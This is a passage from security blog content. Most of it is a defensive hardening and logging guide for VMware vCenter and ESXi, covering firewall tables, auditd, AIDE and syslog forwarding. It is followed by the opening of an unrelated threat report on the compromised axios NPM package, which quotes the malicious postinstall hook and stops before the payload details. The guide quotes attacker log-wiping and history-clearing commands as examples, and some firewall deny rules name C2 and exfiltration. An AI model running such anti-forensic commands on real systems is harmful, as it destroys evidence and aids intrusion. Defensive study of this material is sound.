Secure Remote Console (MKS) Access |
|
ESXi |
VCSA IP |
TCP / 443 |
ALLOW |
ESXi Host to vCenter communication |
|
Backup |
VCSA IP |
TCP / 443 |
ALLOW |
Backup API Access |
|
Monitoring |
Mgmt VLAN |
ICMP Ping UDP / 161 (SNMP) |
ALLOW |
Verified Infrastructure Health Probes |
|
ANY |
Mgmt VLAN |
TCP / 22 |
DENY |
MANDATORY SSH BLOCK. Enforce shell access via PAW only. |
|
ANY |
Mgmt VLAN |
TCP / 5480 |
DENY |
MANDATORY VAMI BLOCK. Prevents unauthorized management enablement. |
|
Guest VM |
Mgmt VLAN |
ANY |
DENY |
Eliminates all East-West lateral movement paths |
B. Egress Filtering (Outbound from VCSA/Management)
|
Source |
Destination |
Protocol / Port |
Policy |
Mitigation |
|
VCSA |
Internal DNS |
UDP/TCP 53 |
ALLOW |
Restrict DNS to trusted internal resolvers only. |
|
VCSA |
Remote Syslog |
TCP / 6514 |
ALLOW |
TLS Encrypted Telemetry. Required for SIEM visibility |
|
VCSA |
Public IP for VMware Update Manager |
TCP / 443 |
ALLOW |
Strictly limit to "162.159.140.167" and "172.66.0.165" (VMware Update servers). |
|
VCSA |
Identity Provider |
TCP / 443 |
ALLOW |
Required for Federated Authentication (Okta/Entra) |
|
VCSA |
Internal Subnets |
ANY |
DENY |
Block Internal Scanning. Prevents VCSA-to-Internal pivots. |
|
VCSA |
Internet (ANY) |
ANY |
DENY |
Suppresses C2. Blocks DoH, SOCKS proxies, and data exfiltration. |
Note on Micro-Segmentation: While physical firewalls secure the management plane (North-South), VMware NSX Distributed Firewall (DFW) is the required standard for controlling guest-to-guest (East-West) traffic. Where applicable, NSX should be used to protect the data plane, while physical network hardware remains the control of the management plane.
Host-Based Firewalls for VCSA and ESXi
Host-based firewalls should be used in tandem with network-based firewalls to achieve a resilient defense-in-depth posture. While network firewalls effectively manage "North-South" traffic (entering/leaving the subnet), they are blind to "East-West" traffic within the same VLAN. Host-based firewalls are capable of blocking an attacker sitting on the same network segment. By enforcing security at the individual endpoint, organizations can ensure that the access path does not grant logical authority over the vSphere control plane.
The VCSA Host-Based Firewall (Photon OS)
Managed via the Virtual Appliance Management Interface (VAMI), the VCSA firewall is a native control to prevent lateral movement from compromised "trusted" entities such as backup servers or monitoring devices that share the management VLAN. The firewall should be used as a primary layer of defense to enforce the "principle of least privilege" at the host network level.
Strategic Implementation: The default policy should be transitioned to "Default Deny." You should explicitly define authorized IP addresses for every management service.
Recommended VCSA Host-Based Firewall Scoping
|
Port |
Protocol |
Source |
Detail |
|
UI / API (443) |
TCP |
PAW IP + Backup IP |
Restricts vSphere Client access to hardened Admin stations. |
|
VAMI (5480) |
TCP |
PAW IP Only |
Prevents unauthorized SSH enablement or log tampering. |
|
SSH (22) |
TCP |
PAW IP Only |
Eliminates the primary shell residency path. |
|
Heartbeat (902) |
UDP |
ESXi Management Subnet |
Required for continuous Host-to-vCenter synchronization. |
|
Internal (LADB) |
TCP |
Localhost (127.0.0.1) |
Protects local inter-process communication. |
|
ANY / ANY |
ANY |
DENY ALL |
Blocks all unauthorized internal discovery. |
Limitations of the VAMI GUI Firewall
While the host-based firewall in the VCSA is a mandatory component of a defense-in-depth strategy, administrators should recognize that the standard VAMI GUI has the following operational limitations for defending against threat actors:
-
Lack of Port-Specific Granularity:The VAMI GUI lacks the precision required for a True Zero Trust model. In all versions, creating an IP-based rule for a specific server (e.g., a virtual backup server) forces an "all-or-nothing" approach. To grant that server legitimate access to the vSphere API on TCP 443, the administrator is often forced to trust that IP for all ports.
The Risk: This simultaneously grants the backup server unauthorized access to highly sensitive management interfaces like SSH (22) and the VAMI (5480). If an attacker compromises the backup server, they inherit an unobstructed management path to the VCSA shell.
-
Circular Administrative Dependency:A fundamental weakness of the native vCenter host-based firewall is its logical placement within the management plane it is intended to secure. The firewall is managed via the VAMI, which represents a secondary management entry point residing on TCP port 5480. This interface is logically adjacent to the standard vSphere Client (TCP port 443) and is frequently exposed across the same management network segments.
The Risk: Credentials captured viaBRICKSTEALgrant a threat actor authority to reconfigure the appliance itself. By pivoting to the VAMI, the actor can use their compromised role to deactivate the firewall. This circular dependency ensures the firewall is managed by the very application it is intended to protect, allowing a threat actor to disable controls using the system's own management tools.
-
Forensic Visibility Gaps:The standard VAMI firewall is designed for connectivity management, not security monitoring. It does not generate remote logs for denied connection attempts or specific shell activity.
The Risk: This blinds security teams to active lateral movement. A threat actor can scan the VCSA from an unauthorized VM multiple times or use a VCSA shell unmonitored; because the firewall does not notify when it blocks a connection and shell commands are not logged, the SOC remains unaware of the intrusion attempt until the final stage of the attack.
-
Inbound-Only Policy Visibility Gaps:The GUI focuses primarily only on inbound traffic, leaving the Outbound (Egress) policy unmanaged.
The Risk: Modern malware, such as theBRICKSTORMbackdoor, relies on outbound "Phone Home" (C2) traffic to receive commands. A firewall that does not restrict outbound traffic allows a compromised VCSA to communicate with external malicious infrastructure without restriction.
To overcome these limitations of the native VAMI firewall, organizations are recommended to consider the transition from native vSphere GUI-based management to OS-level hardening using the underlying Photon Linux iptables or nftables.
-
Tamper-Proof Integrity: By implementing granular firewall rules directly at the Photon Linux operating system level, the controls become independent of vCenter application permissions. Even a compromised vCenter Administrator cannot disable Photon OS-level rules via the VCSA GUI.
-
Granular Logic: OS-level rules allow for strict "Source IP + Destination Port" mapping, ensuring a backup server only sees port 443 and is rejected on all others.
-
Transformation into a Sensor: Unlike the VCSA GUI, Photon OS-level logging can be "bridged" to a security information and event management (SIEM) which transforms every denied connection attempt into a high-fidelity, early-warning alert.
The VAMI GUI firewall should be viewed as a basic security control, not a comprehensive Tier-0 security control. To effectively mitigate the attack vectors required for advanced campaigns, organizations should bypass the vulnerable GUI and enforce a strictly validated, granular, and logged firewall policy at the VCSA Photon Linux kernel level.
- aside_block
- <ListValue: [StructValue([('title', 'vCenter Hardening Script'), ('body', <wagtail.rich_text.RichText object at 0x7f65cc4b8dc0>), ('btn_text', 'Get the tool!'), ('href', 'https://github.com/mandiant/vcsa-hardening-tool'), ('image', None)])]>
The ESXi Hypervisor Firewall
The ESXi firewall is a stateful packet filter sitting between the VMkernel and the network. Restricting individual services to authorized management IPs is the only way to block an attacker on the same VLAN from reaching the host API or SSH port.
Strategic Implementation: Access should be restricted at the service level by deselecting "Allow connections from any IP address" and entering specific management IPs.
Recommended ESXi Host-Based Firewall Rules
|
Service Category |
Service Name |
Port / Protocol |
Authorized Source |
Strategic Defensive Value |
|
Management Access |
SSH Server, vSphere Web Client/Access |
22, 443 / TCP |
PAW Subnet / IPs only |
Ensures shell and GUI access is restricted to hardened admin PAWs. |
|
vCenter Control Plane |
vCenter Agent (vpxa), Update Manager |
902, 80 / TCP |
VCSA IP Only |
Prevents unauthorized entities from impersonating the VCSA. |
|
Intra-Cluster |
vMotion, HA, Fault Tolerance, DVSSync |
8000, 8182 / TCP, 12345 / UDP |
ESXi Mgmt Subnet / IPs |
Prevents interception of unencrypted RAM data and heartbeat tampering. |
|
Storage |
NFC (File Copy), HBR (Replication) |
902, 31031 / TCP |
VCSA IP + Cluster IPs |
Prevents unauthorized VMDK extraction or out-of-band data cloning. |
|
Telemetry |
Syslog, SNMP, NTP, DNS |
514, 161, 123, 53 / UDP |
SIEM & Infra Subnets |
Ensures telemetry and core services are bound to verified internal providers. |
|
Legacy / High Risk |
CIM Server, SLP (Discovery) |
5988, 5989 / TCP, 427 / UDP |
EXPLICIT DENY / Monitoring IP |
Neutralizes RCE vectors targeting the primary attack surface used for ESXi-specific ransomware (VMSA-2021-0002). |
Hardening as a Detection Enabler
When the infrastructure is configured with a "Default Deny" posture, it creates the friction necessary to expose a threat actor. In an unhardened environment, an attacker's port scan or lateral movement attempt is silent and successful; in a hardened environment, those same actions become indicators of compromise.
The Multi-Layered Signal Chain
-
Network-Level Visibility: Detection begins at the transit layer. Organizations should ensure that logging is enabled at the physical network and virtual switch (VDS) levels. This allows the SOC to track the "path" of a threat actor, identifying unauthorized scanning or connection attempts as they traverse subnets toward the vSphere management plane.
-
Host-Based Firewall Logging (IPtables): While the VCSA provides a management GUI for its firewall, it does not natively log denied access. To transform the appliance into a sensor, host-based firewall logging is strictly dependent on a custom OS-level IPtables configuration. By adding a logging target to the underlying Photon OS kernel, every rejected packet is recorded, providing the proof that an unauthorized threat actor is attempting to access the VCSA.
-
Immutable Logging: By enabling Remote Syslog Forwarding, these rejection logs are offloaded instantly. Even if an attacker eventually compromises the host, they cannot delete the local log sources.
Early Detection Signals
By correlating the denied access with identity-based events, organizations can identify a pattern of a BRICKSTORM lifecycle event in its earliest stages:
-
Failed Authentication Alerts: A log entry in the standard auth.log (for SSH) or a vCenter UserLoginSessionEvent showing a "Failed Login Attempt" from an unauthorized internal IP is a high-value alert.
-
Account Lockout Events: When an actor attempts to brute-force or use harvested credentials against local "break-glass" accounts (like administrator@vsphere.local), the resulting "Account Locked" event provides a high-priority signal that a targeted credential attack is in progress.
-
Behavioral Pattern Correlation: The most powerful signal occurs when the SIEM correlates these disparate sources. For example, a Firewall Drop (via IPtables) followed immediately by a Failed Login (via SSO) from the same source IP is a high-confidence indicator of an active intrusion attempt.
Network segmentation at the switch level is a prerequisite, but host-based firewalls are the primary enforcement point of a vSphere Zero Trust architecture. By complementing network-based firewalls with host-level filtering, organizations can eliminate the visibility gap on the management VLAN and transform the VCSA and ESXi hosts into sensors capable of exposing an adversary at the earliest stage of an intrusion.
Phase 4: Logging and Forensic Visibility
To facilitate the detection within the vSphere control plane, organizations should achieve comprehensive telemetry across the previously unmonitored layers of the underlying VCSA operating system.
The primary operational advantage exploited in this campaign is the lack of visibility inherent in the virtualization control plane. This monitoring visibility gap is driven by three critical factors:
-
The Logging Gap: By default, VCSA does not forward kernel-level audit logs. If an attacker wipes the local disk, the evidence of their residency is permanently erased.
-
The Restricted Logging Pipeline: Standard modern log forwarding agents such as Fluentd or Logstash are not supported for installation on the VCSA. To maintain appliance integrity, defenders are restricted to using the native rsyslog daemon. This prevents on-host log enrichment or advanced parsing, forcing the SIEM to process raw, legacy data streams. This technical complexity often leads to critical kernel-level signals being misclassified or ignored.
-
Operational Telemetry Fragmentation: Security indicators are frequently buried within standard cluster and application level events. As detailed in the vCenter Event Mapping, critical actions like
VmNetworkAdapterAddedEventorVmClonedEventare logged as routine infrastructure management tasks. Because these signals are operational rather than security-focused, a threat actor's movements are easily disguised as routine tasks.
|
Securing the VCSA requires a transition from passive cluster monitoring to active OS-level hardening, utilizing a 'Default Deny' posture to eliminate the network path often exploited during advanced campaigns. This architectural shift transforms the appliance into a proactive security sensor, where the friction of blocked network activity and initial access serves as a high-fidelity indicator. By moving beyond complex vSphere application telemetry, organizations can generate the precise early warning signals needed to expose a BRICKSTORM intruder at the very moment they attempt unauthorized discovery. |
What is auditd?
The Linux Audit Daemon (auditd) is the kernel's primary subsystem for tracking security-relevant events. Unlike standard "system logs" (which record application and management events), auditd records system calls. It sees exactly what commands were executed in the shell, which files were modified, and which users escalated privileges. The default Photon auditd rules cover Identity (useradd/del) and privilege escalation (sudo/privileged).
auditd Status: Verifying the Current Defensive Posture
auditd is the core forensic foundation for detecting low-level movements. While VCSA Photon logs provide visibility into management tasks, they are fundamentally blind to the "living-off-the-land" (LotL) techniques that define this campaign. This threat actor operates deep within the VCSA shell to execute binary injections, modify startup scripts using sed, and utilize sudo to fuel the BRICKSTEAL credential harvester. Only auditd, by recording the underlying system calls (syscalls), provides a granular record of these command-line maneuvers. In an environment where traditional EDR is absent, auditd captures the minute behavioral patterns that standard logs ignore.
The Default Configuration Gap
Modern VCSAs (vSphere 7 and 8) ship with a pre-configured set of STIG rules (located in /etc/audit/rules.d/audit.STIG.rules). However, there is a restriction in the default configuration:
-
Local Only: By default, auditd writes to a local file (
/var/log/audit/audit.log). -
Invisible to VAMI: The remote logging you configure in the VAMI (Port 5480) does not include these kernel logs by default.
-
The Attack Vector: Actors can gain root access, perform their actions, and simply run
rm -rf /var/log/audit/*to delete the evidence. Unless these logs are streamed to your SIEM in real time, your forensic trail is non-existent. -
Local Log Rotation: Since the local log location is
/var/log/audit/audit.log, it is subject to rotation and deletion. If an attacker wipes this file, the remote syslog version is your only forensic record.
All auditd logs should be forwarded via the VCSA remote syslog. Remote forwarding of auditd is dependent on a "auditd bridge" configuration. If /etc/audisp/plugins.d/syslog.conf is set to active = yes, these logs will be tagged and forwarded. If set to no, they are stored locally only. To enable remote logging of auditd events and ensure forensic persistence, the following steps should be taken:
Step A: Check Service and Rule Status
Before activating the auditd remote logging bridge, you should determine if your VCSA is currently configured for auditd. Run these commands as root:
# 1. Check if the audit service is active
systemctl status auditd
# 2. List the rules currently enforced by the kernel memory
auditctl -lIf auditctl -l returns nothing, your rules have not been loaded, and the kernel is not "watching" for attacker behavior.
Step B: Check the "auditd Bridge" Status
Verify if kernel events are stored on the local disk or being forwarded to your remote SIEM.
# Check the active status of the syslog plugin
# Note: vSphere 8 still uses the /etc/audisp/ path for compatibility
grep "^active" /etc/audisp/plugins.d/syslog.confIf this returns active = no, remote logging of auditd is not configured. The logs are sent only to the VCSA local disk where an attacker can easily wipe them.
Mapping Standard STIG Rules to Attacker TTPs
If your auditctl -l output shows the standard rules are now loaded, you have the following rules in place mapped to identified attacker tactics, techniques, and procedures (TTPs). These rules move you from periodic auditing or threat hunting to real-time behavioral detection.
|
Standard STIG Rule / Key |
TTP Phase |
Defensive Value |
|
-k useradd / -k userdel |
Establish Foothold |
Creates local accounts, deploys backdoors, and deletes them within ~13 minutes. These rules log both ends of this rapid lifecycle. |
|
-k execpriv (execve syscalls) |
Binary Execution |
Triggers when the actor executes unauthorized binaries (e.g., |
|
-k perm_mod (chmod, chown) |
Weaponization |
Actors use sed to inject code into startup scripts and then run |
|
-k privileged (sudo, su) |
Credential Theft |
|
|
-k modules (init_module) |
Establish Persistence |
Logs attempts to load malicious kernel modules or persistence drivers into the Photon OS. |
|
-k shadow / -k passwd |
Anti-Forensics |
Logs any manual edits to the system's identity files used to create "trapdoor" root users. |
Activating Remote Logging for auditd
Step 1: Enable the Syslog Plugin
The Audit Dispatcher (audisp) should be configured to send events to the local syslog service so they can be forwarded via the VCSA remote syslog.
# Use sed to change the status from 'no' to 'yes'
sed -i 's/^active = no/active = yes/' /etc/audisp/plugins.d/syslog.conf
# Verify the change
grep "^active" /etc/audisp/plugins.d/syslog.confStep 2: Restart the Audit Daemon
You should reload the service to initialize the dispatcher and the syslog bridge:
kill -HUP $(pidof auditd)Step 3: Verify the Bridge Is Operational
Check the local system messages to ensure the plugin has started successfully:
grep "audisp-syslog" /var/log/messagesYou should see a message indicating the plugin has initialized or started.
Step 4: Confirm Logs Are Forwarded
journalctl -f | grep auditYou should see events with msg=audit prefix.
Syslog Tag (Key): In your SIEM, you should search for the field msg=audit followed by the key="XYZ" (e.g., key="execpriv"). This allows you to filter out of standard system logs and focus only on high-fidelity security events.
Additional Auditd Rules
Based on a default audit.STIG.rules output contained in the Photon OS 4.0 STIG auditd config, these three rules should be added.
|
Recommended Rule Addition |
TTP |
Detail |
|
-w /usr/bin/rpm -p x -k software_mgmt |
Malware Deployment |
Detects SLAYSTYLE: Logs the execution of the RPM installer. Essential for spotting the deployment of unauthorized tools or malicious packages. |
|
-w /etc/init.d/ -p wa -k startup_scripts |
Establish Persistence |
Detects Startup Injections: Directly identifies the sed-based modifications used by threat actors to ensure backdoors survive a reboot. |
|
-w /root/.ssh/authorized_keys -p wa -k ssh_key_tamper |
Establish Persistence |
Persistence Sensor: Any write ( |
Advanced Intrusion Detection Environment (AIDE)
While auditd provides low-level monitoring, AIDE serves as the source of digital validation for the VCSA. AIDE is a host-based file integrity monitoring (FIM) tool that is considered the industry standard for high-security Linux environments and is a requirement for DISA STIG compliance (PHTN-40-000237).
Note: Mandiant recommends organizations perform comprehensive testing and fine-tuning of these rules within a staging environment before production deployment to account for variations in specific vSphere configurations and operational workloads. Proper calibration of monitoring thresholds and file exclusion lists is essential to achieve an optimal signal-to-noise ratio and ensure high-fidelity alerting of unauthorized modifications.
Why AIDE Is Essential Alongside auditd
Relying on a single telemetry stream is insufficient to counter the sophisticated tactics of BRICKSTORM. By pairing AuditD's behavioral auditing with AIDE's cryptographic integrity checks, organizations establish a mutual defense that reduces an attacker's ability to operate undetected.
- auditd (Behavioral Monitoring): Captures the action (e.g., "Root used sed to modify a script"). If an attacker achieves high-level privileges and "blinds" the audit service or wipes the local logs, the behavioral trail is lost.
- AIDE (State Monitoring): Captures the result. AIDE creates a cryptographic baseline (DNA fingerprint) of every critical system file. It does not care how a file was changed or if the audit logs were wiped; it only cares that the file is no longer authentic.
Using AIDE Alongside auditd
The following steps walk through how to verify the current AIDE integrity foundation, add BRICKSTORM specific detections, and establish an immutable cryptographic baseline.
1: Diagnostic Assessment
Before modifying the environment, you should confirm the AIDE configuration status. Log in to the VCSA via SSH and run these commands as root:
Confirm AIDE is installed and compiled with the required config (WITH_AUDIT and SHA-512).
# Check version and compiled options
aide -v2. Verify the AIDE Database
AIDE requires that a cryptographic baseline (snapshot) exists. Check the status of the database:
# Resolve the database directory (typically /var/lib/aide)
grep "@@define DBDIR" /etc/aide.conf
# Check for the active database
ls -lh /var/lib/aide/aide.db.gzIf aide.db.gz is missing, you have no baseline. If it exists but the timestamp is months old, your integrity foundation is stale and will produce high-noise alerts during a check.
3. Audit Current AIDE Coverage
Determine which parent directories are currently being monitored by the default rules:
# Filter for active file selection rules
grep -v "^#" /etc/aide.conf | grep "^/"4. Editing AIDE Rule Set for BRICKSTORM Coverage
Open the configuration file.
vi /etc/aide.confAppend these BRICKSTORM specific rules to the bottom. Use the STIG rule group to ensure SHA-512 enforcement.
# --- BRICKSTORM TARGETS ---
/root/.ssh STIG # Detects unauthorized SSH
/lib64 STIG # Detects system-level libraries
/etc/aide.conf STIG # Detects tampering with AIDE
/etc/audit/ STIG # Detects attempts to edit config
/etc/audisp/ STIG # Detects attempts to sever bridgeAppend the file for log exclusions to reduce noise [the ! should come before the rules that tell AIDE to watch the parent folders (like /opt or /etc)].
# --- NOISE REDUCTION: EXCLUDE DYNAMIC LOGS ---
!/var/log/.* # Ignore all standard logs
!/opt/vmware/var/log/.* # Ignore vCenter-specific service logs
!/var/lib/.* # Ignore dynamic database/state filesNote: Remove all # from append statements.
5. Initializing the AIDE Database
Once the rules are defined, you should generate a new cryptographic snapshot. This should only be performed when the VCSA is verified clean (e.g., immediately after patching).
# 1. Initialize the new fingerprint database
aide --init
# 2. Activate the database
mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gzCopy the aide.db.gz to a read-only, off-box location. Comparing the VCSA against an off-box "Gold Image" ensures that even root-level attackers cannot hide their modifications by re-initializing the local database.
6. Enable the Remote Logging of AIDE Events via Logger Pipe
# Run a check and bridge the output to Syslog/SIEM
aide --check | logger -t AIDE_TRAP -p local6.crit7. Enable Automation of AIDE Database Check
To move from manual oversight to automated alerting, you should establish a recurring scheduled task. This ensures that the VCSA programmatically verifies its own state and reports any discrepancies.
Open crontab:
crontab -eAdd the following edit to configure the task:
# Execute check every 6 hours and send results via VCSA remote syslog
0 */6 * * * /usr/bin/aide --check | logger -t AIDE_TRAP -p local6.crit8. Conduct a Test Event
To confirm your defense is operational and your SIEM is successfully receiving AIDE alerts, perform a simulated breach.
Add a comment to a monitored area (e.g., /etc/rc.local):
echo "# Forensic Bridge Test" >> /etc/rc.localTrigger a remote event trap:
aide --check | logger -t AIDE_TRAP -p local6.critVerify the Alert: Check the VCSA remote syslog target for the tag AIDE_TRAP:
AIDE found differences between database and filesystem!! followed by Changed files: /etc/rc.local.VCSA Shell History
On a Photon-based VCSA, the /root/.bash_history file is not replicated to any other log file, nor is it sent to a remote syslog by default. This represents a major forensic visibility gap that threat actors take advantage of to maintain their unmonitored persistence.
-
The Buffer Issue: Commands typed into the shell are kept in a memory buffer. They are only written (appended) to the physical file on the disk when the user logs out of the session.
-
The Anti-Forensics Risk: If a threat actor gains shell access, their first move is often to run
unset HISTFILEorhistory -c. This prevents the memory buffer from ever being written to the disk. Even if the file is written, an attacker can simply runrm /root/.bash_historybefore exiting. -
No Remote Transmission: Standard VCSA syslog configurations monitor directories like
/var/log/. They do not monitor hidden user files like.bash_history.
The reason the auditd remote syslog discussed in the previous steps is so critical is that it bypasses the need for .bash_history entirely. auditd intercepts system calls (syscalls) at the kernel level and exfiltrates detailed forensic data including the original User ID (AUID) and command outcomes to a remote SIEM as the command is executed. This bridge ensures that even if a threat actor purges local logs or crashes the session, an immutable, real-time audit trail remains securely preserved off-appliance.
Logging Design Principles
Recent CISA reporting and GTIG analysis describe threat actors abusing management interfaces (including enabling SSH), making persistence-related configuration changes, and using vCenter capabilities to access high-value virtual machines. An organization's logging strategy should therefore prioritize management-plane audit trails, service-state changes, identity events, hypervisor telemetry, and centralized forwarding.
-
Centralize first, then tune. Forward logs off-host in near real time so an attacker cannot tamper with them by wiping local disks. Configure both VCSA and ESXi to forward to a central syslog/SIEM target.
-
Treat logs as Tier-0 data. If vCenter is Tier-0, then vCenter/ESXi logs are also Tier-0. Restrict who can read them, who can change forwarding settings, and who can stop logging services.
-
Make timestamps defensible. Ensure consistent Network Time Protocol (NTP) across VCSA, ESXi hosts, jump boxes, and log collectors so correlation is reliable during an incident.
-
Log the actions that matter, not everything. For threat actor activity, you care less about generic "system is running" noise and more about: who accessed management, what changed, what was cloned/exported, what services were enabled, what binaries/configs were modified, and where the appliance/host talked to on the network.
Organizations should establish a "vSphere logging fundamentals" previously described by Mandiant by offloading all infrastructure logs to a centralized, remote SIEM.
The vSphere Unified Logging Architecture
The following summary table provides a definitive map of the vSphere telemetry streams described. By implementing these steps, organizations can move from a single localized log to a multilayered remote detection architecture that covers the entire BRICKSTORM malware lifecycle.
|
Type |
Forensic Layer |
Signal Observed |
TTP Phase |
Detail |
|
vCenter Application Events |
Management Plane (API/UI) |
Programmatic Event IDs: VmClonedEvent, VibInstalledEvent, HostSshEnabledEvent |
Initial Access / Exfiltration |
Tells you "What" high-level action was performed (e.g., a domain controller was cloned) and the Admin IP responsible. |
|
Identity (SSO) Events |
Identity Layer |
Principal Events: com.vmware.sso.PrincipalManagement |
Establish Persistence |
Detects "Who" was created. Specifically catches the transient accounts used as deployment vehicles for backdoors. |
|
AuditD Kernel Logs |
OS Kernel (Photon OS) |
Syscall Keys: key="execpriv", key="useradd", key="privileged" |
Establish Persistence |
Tells you "How" the shell was used. Captures commands typed by an intruder (e.g., sudo, sed, rpm) even if they delete their bash history. |
|
AIDE Integrity |
Filesystem |
Syslog Tag: AIDE_TRAP stating: "differences found between database and filesystem" |
Establish Persistence |
Tells you "What was modified" to ensure residency. Detects physical changes to binaries and startup scripts that standard logs miss. |
|
IPtables OS Firewall |
Network Layer (Host-Based) |
Kernel Message: VCSA_FW_DROP + Source IP + Destination Port |
Initial Access / Lateral Movement |
Tells you "Who is probing?". Identifies compromised internal VMs attempting to scan or brute-force VCSA management ports (SSH/VAMI). |
Implementation Best Practices
For both the VCSA and ESXi hosts, the implementation of remote syslog should move beyond legacy, unencrypted protocols. The following standards are required to ensure the integrity and survivability of the forensic trail:
-
Encryption via TLS (TCP Port 6514): Sending logs over UDP/514 is insecure and unreliable. Threat actors can access management traffic or spoof log entries. Organizations should enforce TCP with TLS encryption for all syslog traffic. This ensures that logs are encrypted in transit and guarantees delivery through the TCP handshake.
-
Certificate Validation: To prevent man-in-the-middle (MitM) attacks on the logging pipeline, the VCSA and ESXi hosts should be configured to validate the SSL certificate of the remote syslog server. This ensures that telemetry is being sent to a verified security authority and not a rogue listener controlled by the attacker.
-
VCSA Custom Shell Bridging: Because the VCSA does not forward shell activity or denied firewall connections by default, administrators should consider implementing an agentless bridge at the Photon OS level. By configuring the
audisp(Audit Dispatcher) and pipingiptableslogs into the native rsyslog service, the VCSA is transformed from a passive appliance into an active sensor, capable of streaming real-time kernel-level alerts directly into the encrypted TLS pipeline. -
Standardized Retention: Given this threat actor's dwell time averages 393 days, the remote syslog repository should be configured with a minimum retention period of 400 days. This allows investigators to correlate the programmatic
eventTypeIdof a year-old initial compromise with the low-level auditd signals of a current breach.
Summary of Logging Detections
|
Attack Phase |
TTP |
Key Forensic Log Source(s) |
Technical Detail |
|
Initial Access |
Edge Appliance Exploitation |
Tomcat Audit Logs: /home/kos/auditlog/fapi_cl_audit_log.log |
Detects requests to /manager/text/deploy (CVE-2026-22769) to deploy malicious WAR files like SLAYSTYLE. |
|
Reconnaissance & Scanning |
VCSA firewall_audit: SSH_BLOCKED_NEW, WEB_BLOCKED_NEW, VAMI_BLOCKED_NEW |
Identifies attempts to probe management ports (22, 443, 5480) from unauthorized, non-whitelisted IPs. |
|
|
Lateral Movement |
Credential Abuse |
Windows Event 4624 (Type 3); VCSA firewall_audit: ALLOWED SSH |
Detects network logins from appliance IPs using stolen service account credentials. |
|
Stealth Pivoting (Ghost NICs) |
vCenter Events: VmNetworkAdapterAddedEvent (8.0u3+) or VmReconfiguredEvent |
VmNetworkAdapterAddedEvent is a high-fidelity "Critical" signal for bridging VMs into restricted networks. Legacy builds use VmReconfiguredEvent to track unauthorized NIC additions. |
|
|
Takeover |
Management Interface Access |
VAMI Logs: /var/log/vmware/vami/vami-httpd.log |
Records POST requests to /rest/com/vmware/cis/session followed by SSH enablement via PUT requests on port 5480. |
|
Interactive Shell Escape |
SSO Audit (PrincipalManagement); VCSA SHELL_COMMAND |
Monitors membership changes to BashShellAdministrators to escape VAMI to bash; tracks interactive commands like whoami or netstat. |
|
|
Persistence |
Startup Script Injections |
AuditD Key -k startup_scripts; VCSA init files |
Detects sed commands modifying /etc/sysconfig/init or /opt/vmware/etc/init.d/vami-lighttp. |
|
Transient SSO Accounts |
SSO Audit (audit_events.log) |
Rapid creation and deletion of local accounts (e.g., in vsphere.local) used solely for malware deployment. |
|
|
Filesystem Integrity / Binary |
AIDE Monitor (AIDE_TRAP); AuditD Key -k execpriv |
Detects physical changes to binaries in /lib64 or /root/.ssh and execution of unauthorized binaries like vmsrc. |
|
|
Rogue "Ghost VMs" |
AUDIT log “vmx -x” /var/log/shell.log “/bin/vmx” /var/log/shell.log |
Detection of unregistered virtual machine files (.vmx) hidden from standard management consoles. |
|
|
Credential Theft |
Tomcat Memory Scraping |
vCenter Web Logs; AuditD Key -k privileged |
Monitors HTTP requests to /web/saml2/sso/* (BRICKSTEAL); tracks sudo usage for scraping memory or DB credentials. |
|
Offline NTDS.dit Theft |
vCenter Events; vCenter VPXD Logs; ESXi hostd.log |
VmClonedEvent or VmBeingClonedEvent targeting domain controllers followed by VmDiskHotPlugEvent to mount disks offline to extract the ntds.dit database. |
|
|
Exfiltration |
C2 & Data Tunnelling |
VCSA firewall_audit: INTERNET_BLOCKED, ZT_OUTBOUND_DENIED |
Captures VCSA attempting unauthorized outbound calls to external C2 nodes via SOCKS proxies or DoH. |
Conclusion
It is critical for organizations to recognize that the vCenter Server control plane is a primary target for state-sponsored espionage and global ransomware operations. Technical hardening is essential to create the friction required to generate high-fidelity signals. By enforcing barriers such as VCSA OS-level firewalls, phishing-resistant MFA, and restricted management interfaces, organizations force a threat actor to attempt actions that are inherently suspicious.
Addressing forensic visibility gaps through the implementation of auditd, AIDE, and centralized remote logging ensures that evidence of persistence is preserved for incident response activities. Organizations should leverage this enhanced telemetry to build pattern-based behavioral detections rather than relying on static Indicators of Compromise (IoCs). As adversaries increasingly leverage AI across the entire attack lifecycle, the hardening and logging controls outlined in this guide should become the universal vSphere security baseline to ensure every unauthorized movement results in an immediate and immutable forensic response.
North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack
Written by: Austin Larsen, Dima Lenz, Adrian Hernandez, Tyler McLellan, Christopher Gardner, Ashley Zaya, Michael Rudden, Mon Liclican, Muhammad Umair
Introduction
Google Threat Intelligence Group (GTIG) is tracking an active software supply chain attack targeting the popular Node Package Manager (NPM) package "axios." Between March 31, 2026, 00:21 and 03:20 UTC, an attacker introduced a malicious dependency named "plain-crypto-js" into axios NPM releases versions 1.14.1 and 0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, and these packages typically have over 100 million and 83 million weekly downloads, respectively. This malicious dependency is an obfuscated dropper that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.
GTIG attributes this activity to UNC1069, a financially motivated North Korea-nexus threat actor active since at least 2018, based on the use of WAVESHAPER.V2, an updated version of WAVESHAPER previously used by this threat actor. Further, analysis of infrastructure artifacts used in this attack shows overlaps with infrastructure used by UNC1069 in past activities.
This blog details the attack lifecycle, from the initial account compromise to the deployment of operating system (OS)-specific payloads, and provides actionable guidance for defenders to identify and mitigate this threat.
Campaign Overview
On March 31, 2026, GTIG observed the introduction of plain-crypto-js version 4.2.1 as a dependency in the legitimate axios package version 1.14.1. Analysis indicates the maintainer account associated with the axios package was compromised, with the associated email address changed to an attacker-controlled account (ifstap@proton.me).
The threat actor used the postinstall hook within the "package.json" file of the malicious dependency to achieve silent execution. Upon installation of the compromised axios package, NPM automatically executes an obfuscated JavaScript dropper named "setup.js" in the background.
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1",
"postinstall": "node setup.js"
}Malware Analysis
The plain-crypto-js package serves as a payload delivery vehicle. The core component, SILKBELL, setup.js (SHA256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09), dynamically checks the target system's operating system upon execution to deliver platform-specific payloads.
The script uses a custom XOR and Base64-based string obfuscation routine to conceal the command-and-control (C2 or C&C) URL and host OS execution commands. To evade static analysis, it dynamically loads fs, os, and execSync. After successfully dropping the secondary payload, setup.js attempts to delete itself and revert the modified package.json to hide forensic traces of the postinstall hook.
Operating System-Specific Execution Paths
Depending on the identified platform, the dropper executes the following routines.
Windows
